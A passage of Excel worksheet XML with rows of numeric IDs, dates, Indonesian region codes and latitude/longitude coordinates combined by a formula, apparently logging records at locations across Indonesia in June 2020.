        <v>7302</v>
      </c>
      <c r="G2181" t="s">
        <v>7303</v>
      </c>
      <c r="H2181" t="s">
        <v>26</v>
      </c>
      <c r="I2181" t="s">
        <v>1633</v>
      </c>
      <c r="J2181" t="s">
        <v>7304</v>
      </c>
      <c r="L2181" t="s">
        <v>7305</v>
      </c>
      <c r="M2181">
        <v>3175010005</v>
      </c>
      <c r="N2181">
        <v>3175010</v>
      </c>
      <c r="O2181">
        <v>3175</v>
      </c>
      <c r="P2181">
        <v>31</v>
      </c>
      <c r="Q2181" t="s">
        <v>1686</v>
      </c>
      <c r="R2181" t="s">
        <v>546</v>
      </c>
      <c r="S2181" t="s">
        <v>547</v>
      </c>
      <c r="T2181" t="s">
        <v>33</v>
      </c>
      <c r="U2181" s="5">
        <v>10677190</v>
      </c>
      <c r="V2181" s="5" t="s">
        <v>16392</v>
      </c>
      <c r="W2181" s="5">
        <v>-610900</v>
      </c>
      <c r="X2181" t="s">
        <v>20139</v>
      </c>
      <c r="Y2181" t="str">
        <f t="shared" si="34"/>
        <v>-6.10900,106.77190</v>
      </c>
    </row>
    <row r="2182" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2182">
        <v>191859</v>
      </c>
      <c r="B2182" s="1">
        <v>43986</v>
      </c>
      <c r="C2182" s="2">
        <v>0.55230324074074078</v>
      </c>
      <c r="D2182" t="s">
        <v>22</v>
      </c>
      <c r="E2182" t="s">
        <v>23</v>
      </c>
      <c r="F2182" t="s">
        <v>7306</v>
      </c>
      <c r="G2182" t="s">
        <v>7307</v>
      </c>
      <c r="H2182" t="s">
        <v>26</v>
      </c>
      <c r="I2182" t="s">
        <v>137</v>
      </c>
      <c r="J2182" t="s">
        <v>2608</v>
      </c>
      <c r="L2182" t="s">
        <v>7308</v>
      </c>
      <c r="M2182">
        <v>3375020002</v>
      </c>
      <c r="N2182">
        <v>3375020</v>
      </c>
      <c r="O2182">
        <v>3375</v>
      </c>
      <c r="P2182">
        <v>33</v>
      </c>
      <c r="Q2182" t="s">
        <v>7309</v>
      </c>
      <c r="R2182" t="s">
        <v>7310</v>
      </c>
      <c r="S2182" t="s">
        <v>6246</v>
      </c>
      <c r="T2182" t="s">
        <v>1134</v>
      </c>
      <c r="U2182" s="5">
        <v>10968906</v>
      </c>
      <c r="V2182" s="5" t="s">
        <v>16393</v>
      </c>
      <c r="W2182" s="5">
        <v>-690760</v>
      </c>
      <c r="X2182" t="s">
        <v>20140</v>
      </c>
      <c r="Y2182" t="str">
        <f t="shared" si="34"/>
        <v>-6.90760,109.68906</v>
      </c>
    </row>
    <row r="2183" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2183">
        <v>191860</v>
      </c>
      <c r="B2183" s="1">
        <v>43986</v>
      </c>
      <c r="C2183" s="2">
        <v>0.61177083333333326</v>
      </c>
      <c r="D2183" t="s">
        <v>22</v>
      </c>
      <c r="E2183" t="s">
        <v>23</v>
      </c>
      <c r="F2183" t="s">
        <v>7311</v>
      </c>
      <c r="G2183" t="s">
        <v>7312</v>
      </c>
      <c r="H2183" t="s">
        <v>26</v>
      </c>
      <c r="I2183" t="s">
        <v>1194</v>
      </c>
      <c r="J2183" t="s">
        <v>4755</v>
      </c>
      <c r="L2183" t="s">
        <v>7313</v>
      </c>
      <c r="M2183">
        <v>3175020003</v>
      </c>
      <c r="N2183">
        <v>3175020</v>
      </c>
      <c r="O2183">
        <v>3175</v>
      </c>
      <c r="P2183">
        <v>31</v>
      </c>
      <c r="Q2183" t="s">
        <v>2667</v>
      </c>
      <c r="R2183" t="s">
        <v>2228</v>
      </c>
      <c r="S2183" t="s">
        <v>547</v>
      </c>
      <c r="T2183" t="s">
        <v>33</v>
      </c>
      <c r="U2183" s="5">
        <v>10680970</v>
      </c>
      <c r="V2183" s="5" t="s">
        <v>16394</v>
      </c>
      <c r="W2183" s="5">
        <v>-612432</v>
      </c>
      <c r="X2183" t="s">
        <v>20141</v>
      </c>
      <c r="Y2183" t="str">
        <f t="shared" si="34"/>
        <v>-6.12432,106.80970</v>
      </c>
    </row>
    <row r="2184" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2184">
        <v>191861</v>
      </c>
      <c r="B2184" s="1">
        <v>43986</v>
      </c>
      <c r="C2184" s="2">
        <v>0.61398148148148146</v>
      </c>
      <c r="D2184" t="s">
        <v>22</v>
      </c>
      <c r="E2184" t="s">
        <v>23</v>
      </c>
      <c r="F2184" s="3" t="s">
        <v>7314</v>
      </c>
      <c r="G2184" t="s">
        <v>7315</v>
      </c>
      <c r="H2184" t="s">
        <v>26</v>
      </c>
      <c r="I2184" t="s">
        <v>1194</v>
      </c>
      <c r="J2184" t="s">
        <v>5372</v>
      </c>
      <c r="L2184" t="s">
        <v>7316</v>
      </c>
      <c r="M2184">
        <v>3175020003</v>
      </c>
      <c r="N2184">
        <v>3175020</v>
      </c>
      <c r="O2184">
        <v>3175</v>
      </c>
      <c r="P2184">
        <v>31</v>
      </c>
      <c r="Q2184" t="s">
        <v>2667</v>
      </c>
      <c r="R2184" t="s">
        <v>2228</v>
      </c>
      <c r="S2184" t="s">
        <v>547</v>
      </c>
      <c r="T2184" t="s">
        <v>33</v>
      </c>
      <c r="U2184" s="5">
        <v>10682822</v>
      </c>
      <c r="V2184" s="5" t="s">
        <v>16395</v>
      </c>
      <c r="W2184" s="5">
        <v>-613028</v>
      </c>
      <c r="X2184" t="s">
        <v>20142</v>
      </c>
      <c r="Y2184" t="str">
        <f t="shared" si="34"/>
        <v>-6.13028,106.82822</v>
      </c>
    </row>
    <row r="2185" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2185">
        <v>192086</v>
      </c>
      <c r="B2185" s="1">
        <v>43987</v>
      </c>
      <c r="C2185" s="2">
        <v>0.78560185185185183</v>
      </c>
      <c r="D2185" t="s">
        <v>22</v>
      </c>
      <c r="E2185" t="s">
        <v>23</v>
      </c>
      <c r="F2185" t="s">
        <v>7317</v>
      </c>
      <c r="H2185" t="s">
        <v>26</v>
      </c>
      <c r="I2185" t="s">
        <v>1046</v>
      </c>
      <c r="J2185" t="s">
        <v>1715</v>
      </c>
      <c r="L2185" t="s">
        <v>7318</v>
      </c>
      <c r="M2185">
        <v>3175010005</v>
      </c>
      <c r="N2185">
        <v>3175010</v>
      </c>
      <c r="O2185">
        <v>3175</v>
      </c>
      <c r="P2185">
        <v>31</v>
      </c>
      <c r="Q2185" t="s">
        <v>1686</v>
      </c>
      <c r="R2185" t="s">
        <v>546</v>
      </c>
      <c r="S2185" t="s">
        <v>547</v>
      </c>
      <c r="T2185" t="s">
        <v>33</v>
      </c>
      <c r="U2185" s="5">
        <v>10677255</v>
      </c>
      <c r="V2185" s="5" t="s">
        <v>16396</v>
      </c>
      <c r="W2185" s="5">
        <v>-611185</v>
      </c>
      <c r="X2185" t="s">
        <v>20143</v>
      </c>
      <c r="Y2185" t="str">
        <f t="shared" si="34"/>
        <v>-6.11185,106.77255</v>
      </c>
    </row>
    <row r="2186" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2186">
        <v>192090</v>
      </c>
      <c r="B2186" s="1">
        <v>43987</v>
      </c>
      <c r="C2186" s="2">
        <v>0.794988425925926</v>
      </c>
      <c r="D2186" t="s">
        <v>22</v>
      </c>
      <c r="E2186" t="s">
        <v>23</v>
      </c>
      <c r="F2186" t="s">
        <v>7319</v>
      </c>
      <c r="H2186" t="s">
        <v>26</v>
      </c>
      <c r="I2186" t="s">
        <v>1953</v>
      </c>
      <c r="J2186" t="s">
        <v>1715</v>
      </c>
      <c r="L2186" t="s">
        <v>7320</v>
      </c>
      <c r="M2186">
        <v>3175010005</v>
      </c>
      <c r="N2186">
        <v>3175010</v>
      </c>
      <c r="O2186">
        <v>3175</v>
      </c>
      <c r="P2186">
        <v>31</v>
      </c>
      <c r="Q2186" t="s">
        <v>1686</v>
      </c>
      <c r="R2186" t="s">
        <v>546</v>
      </c>
      <c r="S2186" t="s">
        <v>547</v>
      </c>
      <c r="T2186" t="s">
        <v>33</v>
      </c>
      <c r="U2186" s="5">
        <v>10677224</v>
      </c>
      <c r="V2186" s="5" t="s">
        <v>14638</v>
      </c>
      <c r="W2186" s="5">
        <v>-611165</v>
      </c>
      <c r="X2186" t="s">
        <v>20144</v>
      </c>
      <c r="Y2186" t="str">
        <f t="shared" si="34"/>
        <v>-6.11165,106.77224</v>
      </c>
    </row>
    <row r="2187" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2187">
        <v>192092</v>
      </c>
      <c r="B2187" s="1">
        <v>43987</v>
      </c>
      <c r="C2187" s="2">
        <v>0.79790509259259268</v>
      </c>
      <c r="D2187" t="s">
        <v>22</v>
      </c>
      <c r="E2187" t="s">
        <v>23</v>
      </c>
      <c r="F2187" t="s">
        <v>7321</v>
      </c>
      <c r="H2187" t="s">
        <v>26</v>
      </c>
      <c r="I2187" t="s">
        <v>386</v>
      </c>
      <c r="J2187" t="s">
        <v>7304</v>
      </c>
      <c r="L2187" t="s">
        <v>7322</v>
      </c>
      <c r="M2187">
        <v>3175010005</v>
      </c>
      <c r="N2187">
        <v>3175010</v>
      </c>
      <c r="O2187">
        <v>3175</v>
      </c>
      <c r="P2187">
        <v>31</v>
      </c>
      <c r="Q2187" t="s">
        <v>1686</v>
      </c>
      <c r="R2187" t="s">
        <v>546</v>
      </c>
      <c r="S2187" t="s">
        <v>547</v>
      </c>
      <c r="T2187" t="s">
        <v>33</v>
      </c>
      <c r="U2187" s="5">
        <v>10677200</v>
      </c>
      <c r="V2187" s="5" t="s">
        <v>16397</v>
      </c>
      <c r="W2187" s="5">
        <v>-610910</v>
      </c>
      <c r="X2187" t="s">
        <v>20145</v>
      </c>
      <c r="Y2187" t="str">
        <f t="shared" si="34"/>
        <v>-6.10910,106.77200</v>
      </c>
    </row>
    <row r="2188" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2188">
        <v>192259</v>
      </c>
      <c r="B2188" s="1">
        <v>43988</v>
      </c>
      <c r="C2188" s="2">
        <v>0.375</v>
      </c>
      <c r="D2188" t="s">
        <v>2648</v>
      </c>
      <c r="E2188" t="s">
        <v>23</v>
      </c>
      <c r="G2188" t="s">
        <v>7323</v>
      </c>
      <c r="H2188" t="s">
        <v>26</v>
      </c>
      <c r="J2188" t="s">
        <v>1152</v>
      </c>
      <c r="L2188" t="s">
        <v>7324</v>
      </c>
      <c r="M2188">
        <v>3173070001</v>
      </c>
      <c r="N2188">
        <v>3173070</v>
      </c>
      <c r="O2188">
        <v>3173</v>
      </c>
      <c r="P2188">
        <v>31</v>
      </c>
      <c r="Q2188" t="s">
        <v>322</v>
      </c>
      <c r="R2188" t="s">
        <v>323</v>
      </c>
      <c r="S2188" t="s">
        <v>62</v>
      </c>
      <c r="T2188" t="s">
        <v>33</v>
      </c>
      <c r="U2188" s="5">
        <v>10683218</v>
      </c>
      <c r="V2188" s="5" t="s">
        <v>16398</v>
      </c>
      <c r="W2188" s="5">
        <v>-616726</v>
      </c>
      <c r="X2188" t="s">
        <v>20146</v>
      </c>
      <c r="Y2188" t="str">
        <f t="shared" si="34"/>
        <v>-6.16726,106.83218</v>
      </c>
    </row>
    <row r="2189" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2189">
        <v>192348</v>
      </c>
      <c r="B2189" s="1">
        <v>43989</v>
      </c>
      <c r="C2189" s="2">
        <v>9.5451388888888891E-2</v>
      </c>
      <c r="D2189" t="s">
        <v>22</v>
      </c>
      <c r="E2189" t="s">
        <v>23</v>
      </c>
      <c r="F2189" t="s">
        <v>7325</v>
      </c>
      <c r="G2189" t="s">
        <v>7326</v>
      </c>
      <c r="H2189" t="s">
        <v>26</v>
      </c>
      <c r="I2189" t="s">
        <v>3275</v>
      </c>
      <c r="J2189" t="s">
        <v>7327</v>
      </c>
      <c r="M2189">
        <v>3175010005</v>
      </c>
      <c r="N2189">
        <v>3175010</v>
      </c>
      <c r="O2189">
        <v>3175</v>
      </c>
      <c r="P2189">
        <v>31</v>
      </c>
      <c r="Q2189" t="s">
        <v>1686</v>
      </c>
      <c r="R2189" t="s">
        <v>546</v>
      </c>
      <c r="S2189" t="s">
        <v>547</v>
      </c>
      <c r="T2189" t="s">
        <v>33</v>
      </c>
      <c r="U2189" s="5">
        <v>10677090</v>
      </c>
      <c r="V2189" s="5" t="s">
        <v>16399</v>
      </c>
      <c r="W2189" s="5">
        <v>-611025</v>
      </c>
      <c r="X2189" t="s">
        <v>20147</v>
      </c>
      <c r="Y2189" t="str">
        <f t="shared" si="34"/>
        <v>-6.11025,106.77090</v>
      </c>
    </row>
    <row r="2190" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2190">
        <v>192349</v>
      </c>
      <c r="B2190" s="1">
        <v>43991</v>
      </c>
      <c r="C2190" s="2">
        <v>7.9027777777777766E-2</v>
      </c>
      <c r="D2190" t="s">
        <v>22</v>
      </c>
      <c r="E2190" t="s">
        <v>23</v>
      </c>
      <c r="F2190" t="s">
        <v>7328</v>
      </c>
      <c r="H2190" t="s">
        <v>26</v>
      </c>
      <c r="I2190" t="s">
        <v>137</v>
      </c>
      <c r="J2190" t="s">
        <v>2608</v>
      </c>
      <c r="L2190" t="s">
        <v>7329</v>
      </c>
      <c r="M2190">
        <v>3321060001</v>
      </c>
      <c r="N2190">
        <v>3321060</v>
      </c>
      <c r="O2190">
        <v>3321</v>
      </c>
      <c r="P2190">
        <v>33</v>
      </c>
      <c r="Q2190" t="s">
        <v>7330</v>
      </c>
      <c r="R2190" t="s">
        <v>7331</v>
      </c>
      <c r="S2190" t="s">
        <v>1428</v>
      </c>
      <c r="T2190" t="s">
        <v>1134</v>
      </c>
      <c r="U2190" s="5">
        <v>11053393</v>
      </c>
      <c r="V2190" s="5" t="s">
        <v>16400</v>
      </c>
      <c r="W2190" s="5">
        <v>-683829</v>
      </c>
      <c r="X2190" t="s">
        <v>20148</v>
      </c>
      <c r="Y2190" t="str">
        <f t="shared" si="34"/>
        <v>-6.83829,110.53393</v>
      </c>
    </row>
    <row r="2191" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2191">
        <v>192350</v>
      </c>
      <c r="B2191" s="1">
        <v>43991</v>
      </c>
      <c r="C2191" s="2">
        <v>8.4490740740740741E-2</v>
      </c>
      <c r="D2191" t="s">
        <v>22</v>
      </c>
      <c r="E2191" t="s">
        <v>23</v>
      </c>
      <c r="F2191" t="s">
        <v>7332</v>
      </c>
      <c r="G2191" t="s">
        <v>7333</v>
      </c>
      <c r="H2191" t="s">
        <v>26</v>
      </c>
      <c r="I2191" t="s">
        <v>137</v>
      </c>
      <c r="J2191" t="s">
        <v>2608</v>
      </c>
      <c r="L2191" t="s">
        <v>7334</v>
      </c>
      <c r="M2191">
        <v>3321050017</v>
      </c>
      <c r="N2191">
        <v>3321050</v>
      </c>
      <c r="O2191">
        <v>3321</v>
      </c>
      <c r="P2191">
        <v>33</v>
      </c>
      <c r="Q2191" t="s">
        <v>7335</v>
      </c>
      <c r="R2191" t="s">
        <v>760</v>
      </c>
      <c r="S2191" t="s">
        <v>1428</v>
      </c>
      <c r="T2191" t="s">
        <v>1134</v>
      </c>
      <c r="U2191" s="5">
        <v>11053493</v>
      </c>
      <c r="V2191" s="5" t="s">
        <v>16401</v>
      </c>
      <c r="W2191" s="5">
        <v>-683968</v>
      </c>
      <c r="X2191" t="s">
        <v>20149</v>
      </c>
      <c r="Y2191" t="str">
        <f t="shared" si="34"/>
        <v>-6.83968,110.53493</v>
      </c>
    </row>
    <row r="2192" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2192">
        <v>192351</v>
      </c>
      <c r="B2192" s="1">
        <v>43991</v>
      </c>
      <c r="C2192" s="2">
        <v>0.24510416666666668</v>
      </c>
      <c r="D2192" t="s">
        <v>22</v>
      </c>
      <c r="E2192" t="s">
        <v>23</v>
      </c>
      <c r="F2192" t="s">
        <v>7336</v>
      </c>
      <c r="G2192" t="s">
        <v>7337</v>
      </c>
      <c r="H2192" t="s">
        <v>26</v>
      </c>
      <c r="I2192" t="s">
        <v>137</v>
      </c>
      <c r="J2192" t="s">
        <v>2608</v>
      </c>
      <c r="M2192">
        <v>3375040008</v>
      </c>
      <c r="N2192">
        <v>3375040</v>
      </c>
      <c r="O2192">
        <v>3375</v>
      </c>
      <c r="P2192">
        <v>33</v>
      </c>
      <c r="Q2192" t="s">
        <v>7338</v>
      </c>
      <c r="R2192" t="s">
        <v>7339</v>
      </c>
      <c r="S2192" t="s">
        <v>6246</v>
      </c>
      <c r="T2192" t="s">
        <v>1134</v>
      </c>
      <c r="U2192" s="5">
        <v>10968174</v>
      </c>
      <c r="V2192" s="5" t="s">
        <v>16402</v>
      </c>
      <c r="W2192" s="5">
        <v>-687431</v>
      </c>
      <c r="X2192" t="s">
        <v>20150</v>
      </c>
      <c r="Y2192" t="str">
        <f t="shared" si="34"/>
        <v>-6.87431,109.68174</v>
      </c>
    </row>
    <row r="2193" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2193">
        <v>192352</v>
      </c>
      <c r="B2193" s="1">
        <v>43991</v>
      </c>
      <c r="C2193" s="2">
        <v>0.25833333333333336</v>
      </c>
      <c r="D2193" t="s">
        <v>2648</v>
      </c>
      <c r="E2193" t="s">
        <v>23</v>
      </c>
      <c r="G2193" t="s">
        <v>7340</v>
      </c>
      <c r="H2193" t="s">
        <v>26</v>
      </c>
      <c r="J2193" t="s">
        <v>6516</v>
      </c>
      <c r="L2193" t="s">
        <v>7341</v>
      </c>
      <c r="M2193">
        <v>3172060001</v>
      </c>
      <c r="N2193">
        <v>3172060</v>
      </c>
      <c r="O2193">
        <v>3172</v>
      </c>
      <c r="P2193">
        <v>31</v>
      </c>
      <c r="Q2193" t="s">
        <v>309</v>
      </c>
      <c r="R2193" t="s">
        <v>48</v>
      </c>
      <c r="S2193" t="s">
        <v>49</v>
      </c>
      <c r="T2193" t="s">
        <v>33</v>
      </c>
      <c r="U2193" s="5">
        <v>10686733</v>
      </c>
      <c r="V2193" s="5" t="s">
        <v>16403</v>
      </c>
      <c r="W2193" s="5">
        <v>-622877</v>
      </c>
      <c r="X2193" t="s">
        <v>20151</v>
      </c>
      <c r="Y2193" t="str">
        <f t="shared" si="34"/>
        <v>-6.22877,106.86733</v>
      </c>
    </row>
    <row r="2194" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2194">
        <v>192783</v>
      </c>
      <c r="B2194" s="1">
        <v>43993</v>
      </c>
      <c r="C2194" s="2">
        <v>0.72399305555555549</v>
      </c>
      <c r="D2194" t="s">
        <v>22</v>
      </c>
      <c r="E2194" t="s">
        <v>23</v>
      </c>
      <c r="F2194" t="s">
        <v>7342</v>
      </c>
      <c r="H2194" t="s">
        <v>26</v>
      </c>
      <c r="I2194" t="s">
        <v>271</v>
      </c>
      <c r="J2194" t="s">
        <v>2627</v>
      </c>
      <c r="L2194" t="s">
        <v>7343</v>
      </c>
      <c r="M2194">
        <v>3275040008</v>
      </c>
      <c r="N2194">
        <v>3275040</v>
      </c>
      <c r="O2194">
        <v>3275</v>
      </c>
      <c r="P2194">
        <v>32</v>
      </c>
      <c r="Q2194" t="s">
        <v>2814</v>
      </c>
      <c r="R2194" t="s">
        <v>100</v>
      </c>
      <c r="S2194" t="s">
        <v>41</v>
      </c>
      <c r="T2194" t="s">
        <v>42</v>
      </c>
      <c r="U2194" s="5">
        <v>10703824</v>
      </c>
      <c r="V2194" s="5" t="s">
        <v>16404</v>
      </c>
      <c r="W2194" s="5">
        <v>-624431</v>
      </c>
      <c r="X2194" t="s">
        <v>20152</v>
      </c>
      <c r="Y2194" t="str">
        <f t="shared" si="34"/>
        <v>-6.24431,107.03824</v>
      </c>
    </row>
    <row r="2195" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2195">
        <v>192784</v>
      </c>
      <c r="B2195" s="1">
        <v>43993</v>
      </c>
      <c r="C2195" s="2">
        <v>0.82710648148148147</v>
      </c>
      <c r="D2195" t="s">
        <v>22</v>
      </c>
      <c r="E2195" t="s">
        <v>23</v>
      </c>
      <c r="F2195" t="s">
        <v>7344</v>
      </c>
      <c r="G2195" t="s">
        <v>7345</v>
      </c>
      <c r="H2195" t="s">
        <v>26</v>
      </c>
      <c r="I2195" t="s">
        <v>424</v>
      </c>
      <c r="J2195" t="s">
        <v>7178</v>
      </c>
      <c r="L2195" t="s">
        <v>7346</v>
      </c>
      <c r="M2195">
        <v>1871060010</v>
      </c>
      <c r="N2195">
        <v>1871060</v>
      </c>
      <c r="O2195">
        <v>1871</v>
      </c>
      <c r="P2195">
        <v>18</v>
      </c>
      <c r="Q2195" t="s">
        <v>7347</v>
      </c>
      <c r="R2195" t="s">
        <v>7348</v>
      </c>
      <c r="S2195" t="s">
        <v>7181</v>
      </c>
      <c r="T2195" t="s">
        <v>2082</v>
      </c>
      <c r="U2195" s="5">
        <v>10525670</v>
      </c>
      <c r="V2195" s="5" t="s">
        <v>16405</v>
      </c>
      <c r="W2195" s="5">
        <v>-540534</v>
      </c>
      <c r="X2195" t="s">
        <v>20153</v>
      </c>
      <c r="Y2195" t="str">
        <f t="shared" si="34"/>
        <v>-5.40534,105.25670</v>
      </c>
    </row>
    <row r="2196" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2196">
        <v>192785</v>
      </c>
      <c r="B2196" s="1">
        <v>43993</v>
      </c>
      <c r="C2196" s="2">
        <v>0.9646527777777778</v>
      </c>
      <c r="D2196" t="s">
        <v>22</v>
      </c>
      <c r="E2196" t="s">
        <v>23</v>
      </c>
      <c r="F2196" t="s">
        <v>7349</v>
      </c>
      <c r="G2196" t="s">
        <v>7350</v>
      </c>
      <c r="H2196" t="s">
        <v>26</v>
      </c>
      <c r="I2196" t="s">
        <v>3668</v>
      </c>
      <c r="J2196" t="s">
        <v>7178</v>
      </c>
      <c r="L2196" t="s">
        <v>1456</v>
      </c>
      <c r="M2196">
        <v>1871083017</v>
      </c>
      <c r="N2196">
        <v>1871083</v>
      </c>
      <c r="O2196">
        <v>1871</v>
      </c>
      <c r="P2196">
        <v>18</v>
      </c>
      <c r="Q2196" t="s">
        <v>7055</v>
      </c>
      <c r="R2196" t="s">
        <v>7351</v>
      </c>
      <c r="S2196" t="s">
        <v>7181</v>
      </c>
      <c r="T2196" t="s">
        <v>2082</v>
      </c>
      <c r="U2196" s="5">
        <v>10525132</v>
      </c>
      <c r="V2196" s="5" t="s">
        <v>16406</v>
      </c>
      <c r="W2196" s="5">
        <v>-536092</v>
      </c>
      <c r="X2196" t="s">
        <v>20154</v>
      </c>
      <c r="Y2196" t="str">
        <f t="shared" si="34"/>
        <v>-5.36092,105.25132</v>
      </c>
    </row>
    <row r="2197" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2197">
        <v>192786</v>
      </c>
      <c r="B2197" s="1">
        <v>43994</v>
      </c>
      <c r="C2197" s="2">
        <v>0.12136574074074075</v>
      </c>
      <c r="D2197" t="s">
        <v>22</v>
      </c>
      <c r="E2197" t="s">
        <v>23</v>
      </c>
      <c r="F2197" t="s">
        <v>7352</v>
      </c>
      <c r="G2197" t="s">
        <v>7353</v>
      </c>
      <c r="H2197" t="s">
        <v>26</v>
      </c>
      <c r="I2197" t="s">
        <v>867</v>
      </c>
      <c r="J2197" t="s">
        <v>6498</v>
      </c>
      <c r="L2197" t="s">
        <v>7354</v>
      </c>
      <c r="M2197">
        <v>7504020011</v>
      </c>
      <c r="N2197">
        <v>7504020</v>
      </c>
      <c r="O2197">
        <v>7504</v>
      </c>
      <c r="P2197">
        <v>75</v>
      </c>
      <c r="Q2197" t="s">
        <v>7355</v>
      </c>
      <c r="R2197" t="s">
        <v>7356</v>
      </c>
      <c r="S2197" t="s">
        <v>7357</v>
      </c>
      <c r="T2197" t="s">
        <v>6501</v>
      </c>
      <c r="U2197" s="5">
        <v>12308374</v>
      </c>
      <c r="V2197" s="5" t="s">
        <v>16407</v>
      </c>
      <c r="W2197" s="5">
        <v>53839</v>
      </c>
      <c r="X2197" t="s">
        <v>20155</v>
      </c>
      <c r="Y2197" t="str">
        <f t="shared" si="34"/>
        <v>0.53839,123.08374</v>
      </c>
    </row>
    <row r="2198" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2198">
        <v>192787</v>
      </c>
      <c r="B2198" s="1">
        <v>43994</v>
      </c>
      <c r="C2198" s="2">
        <v>0.42928240740740736</v>
      </c>
      <c r="D2198" t="s">
        <v>22</v>
      </c>
      <c r="E2198" t="s">
        <v>23</v>
      </c>
      <c r="F2198" t="s">
        <v>7358</v>
      </c>
      <c r="H2198" t="s">
        <v>26</v>
      </c>
      <c r="I2198" t="s">
        <v>137</v>
      </c>
      <c r="J2198" t="s">
        <v>6498</v>
      </c>
      <c r="L2198" t="s">
        <v>7359</v>
      </c>
      <c r="M2198">
        <v>7502082007</v>
      </c>
      <c r="N2198">
        <v>7502082</v>
      </c>
      <c r="O2198">
        <v>7502</v>
      </c>
      <c r="P2198">
        <v>75</v>
      </c>
      <c r="Q2198" t="s">
        <v>7360</v>
      </c>
      <c r="R2198" t="s">
        <v>7361</v>
      </c>
      <c r="S2198" t="s">
        <v>6501</v>
      </c>
      <c r="T2198" t="s">
        <v>6501</v>
      </c>
      <c r="U2198" s="5">
        <v>12303220</v>
      </c>
      <c r="V2198" s="5" t="s">
        <v>16408</v>
      </c>
      <c r="W2198" s="5">
        <v>56815</v>
      </c>
      <c r="X2198" t="s">
        <v>20156</v>
      </c>
      <c r="Y2198" t="str">
        <f t="shared" si="34"/>
        <v>0.56815,123.03220</v>
      </c>
    </row>
    <row r="2199" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2199">
        <v>192788</v>
      </c>
      <c r="B2199" s="1">
        <v>43994</v>
      </c>
      <c r="C2199" s="2">
        <v>0.52722222222222226</v>
      </c>
      <c r="D2199" t="s">
        <v>22</v>
      </c>
      <c r="E2199" t="s">
        <v>23</v>
      </c>
      <c r="F2199" t="s">
        <v>7362</v>
      </c>
      <c r="H2199" t="s">
        <v>26</v>
      </c>
      <c r="I2199" t="s">
        <v>137</v>
      </c>
      <c r="J2199" t="s">
        <v>2615</v>
      </c>
      <c r="L2199" t="s">
        <v>7363</v>
      </c>
      <c r="M2199">
        <v>3471090001</v>
      </c>
      <c r="N2199">
        <v>3471090</v>
      </c>
      <c r="O2199">
        <v>3471</v>
      </c>
      <c r="P2199">
        <v>34</v>
      </c>
      <c r="Q2199" t="s">
        <v>7364</v>
      </c>
      <c r="R2199" t="s">
        <v>7365</v>
      </c>
      <c r="S2199" t="s">
        <v>7273</v>
      </c>
      <c r="T2199" t="s">
        <v>1856</v>
      </c>
      <c r="U2199" s="5">
        <v>11036501</v>
      </c>
      <c r="V2199" s="5" t="s">
        <v>16409</v>
      </c>
      <c r="W2199" s="5">
        <v>-779977</v>
      </c>
      <c r="X2199" t="s">
        <v>20157</v>
      </c>
      <c r="Y2199" t="str">
        <f t="shared" si="34"/>
        <v>-7.79977,110.36501</v>
      </c>
    </row>
    <row r="2200" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2200">
        <v>192789</v>
      </c>
      <c r="B2200" s="1">
        <v>43994</v>
      </c>
      <c r="C2200" s="2">
        <v>0.52902777777777776</v>
      </c>
      <c r="D2200" t="s">
        <v>22</v>
      </c>
      <c r="E2200" t="s">
        <v>23</v>
      </c>
      <c r="F2200" t="s">
        <v>7366</v>
      </c>
      <c r="G2200" t="s">
        <v>7367</v>
      </c>
      <c r="H2200" t="s">
        <v>26</v>
      </c>
      <c r="I2200" t="s">
        <v>7368</v>
      </c>
      <c r="J2200" t="s">
        <v>6626</v>
      </c>
      <c r="L2200" t="s">
        <v>7369</v>
      </c>
      <c r="M2200">
        <v>7303010004</v>
      </c>
      <c r="N2200">
        <v>7303010</v>
      </c>
      <c r="O2200">
        <v>7303</v>
      </c>
      <c r="P2200">
        <v>73</v>
      </c>
      <c r="Q2200" t="s">
        <v>7370</v>
      </c>
      <c r="R2200" t="s">
        <v>7371</v>
      </c>
      <c r="S2200" t="s">
        <v>7372</v>
      </c>
      <c r="T2200" t="s">
        <v>6630</v>
      </c>
      <c r="U2200" s="5">
        <v>11993225</v>
      </c>
      <c r="V2200" s="5" t="s">
        <v>16410</v>
      </c>
      <c r="W2200" s="5">
        <v>-554313</v>
      </c>
      <c r="X2200" t="s">
        <v>20158</v>
      </c>
      <c r="Y2200" t="str">
        <f t="shared" si="34"/>
        <v>-5.54313,119.93225</v>
      </c>
    </row>
    <row r="2201" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2201">
        <v>192790</v>
      </c>
      <c r="B2201" s="1">
        <v>43994</v>
      </c>
      <c r="C2201" s="2">
        <v>0.90678240740740745</v>
      </c>
      <c r="D2201" t="s">
        <v>22</v>
      </c>
      <c r="E2201" t="s">
        <v>23</v>
      </c>
      <c r="F2201" t="s">
        <v>7373</v>
      </c>
      <c r="G2201" t="s">
        <v>7374</v>
      </c>
      <c r="H2201" t="s">
        <v>26</v>
      </c>
      <c r="I2201" t="s">
        <v>878</v>
      </c>
      <c r="J2201" t="s">
        <v>6626</v>
      </c>
      <c r="L2201" t="s">
        <v>7375</v>
      </c>
      <c r="M2201">
        <v>7303010004</v>
      </c>
      <c r="N2201">
        <v>7303010</v>
      </c>
      <c r="O2201">
        <v>7303</v>
      </c>
      <c r="P2201">
        <v>73</v>
      </c>
      <c r="Q2201" t="s">
        <v>7370</v>
      </c>
      <c r="R2201" t="s">
        <v>7371</v>
      </c>
      <c r="S2201" t="s">
        <v>7372</v>
      </c>
      <c r="T2201" t="s">
        <v>6630</v>
      </c>
      <c r="U2201" s="5">
        <v>11993261</v>
      </c>
      <c r="V2201" s="5" t="s">
        <v>16411</v>
      </c>
